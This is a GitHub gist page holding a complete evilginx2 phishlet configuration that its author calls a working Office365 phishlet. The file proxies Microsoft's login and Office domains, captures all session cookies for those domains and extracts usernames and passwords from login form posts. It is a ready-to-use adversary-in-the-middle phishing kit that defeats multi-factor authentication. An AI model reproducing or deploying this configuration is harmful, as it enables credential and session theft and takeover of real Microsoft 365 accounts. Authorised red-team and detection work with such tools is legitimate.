Skip to content

Instantly share code, notes, and snippets.

@hazcod

hazcod/evilginx-o365-phishlet.yml

Last active February 28, 2025 13:16
Show Gist options
  • Save hazcod/887dc2bbc3eb90ac9fd7788867b23416 to your computer and use it in GitHub Desktop.
Save hazcod/887dc2bbc3eb90ac9fd7788867b23416 to your computer and use it in GitHub Desktop.
Download ZIP
Working Office365 phishlet for evilginx2.
Raw
evilginx-o365-phishlet.yml
author: '@hazcod'
min_ver: '3.2.0'
proxy_hosts:
- phish_sub: 'login'
orig_sub: 'login'
domain: 'microsoftonline.com'
session: true
is_landing: true
- phish_sub: 'device.login'
orig_sub: 'device.login'
domain: 'microsoftonline.com'
session: true
is_landing: true
- phish_sub: 'www'
orig_sub: 'www'
domain: 'office.com'
session: false
is_landing: false
sub_filters:
- triggers_on: 'login.microsoftonline.com'
orig_sub: 'login'
domain: 'microsoftonline.com'
search: 'href="https://{hostname}'
replace: 'href="https://{hostname}'
mimes: ['text/html', 'application/json', 'application/javascript']
- triggers_on: 'login.microsoftonline.com'
orig_sub: 'login'
domain: 'microsoftonline.com'
search: 'https://{hostname}'
replace: 'https://{hostname}'
mimes: ['text/html', 'application/json', 'application/javascript']
redirect_only: true
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['.*:regexp']
- domain: 'login.microsoftonline.com'
keys: ['.*:regexp']
- domain: '.microsoft.com'
keys: ['.*:regexp']
- domain: 'microsoft.com'
keys: ['.*:regexp']
- domain: '.office.com'
keys: ['.*:regexp']
- domain: 'office.com'
keys: ['.*:regexp']
auth_urls:
- '/kmsi'
- '/landingv2'
credentials:
username:
key: '(login|UserName)'
search: '(.*)'
type: 'post'
password:
key: '(passwd|Password)'
search: '(.*)'
type: 'post'
login:
domain: 'login.microsoftonline.com'
path: '/'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment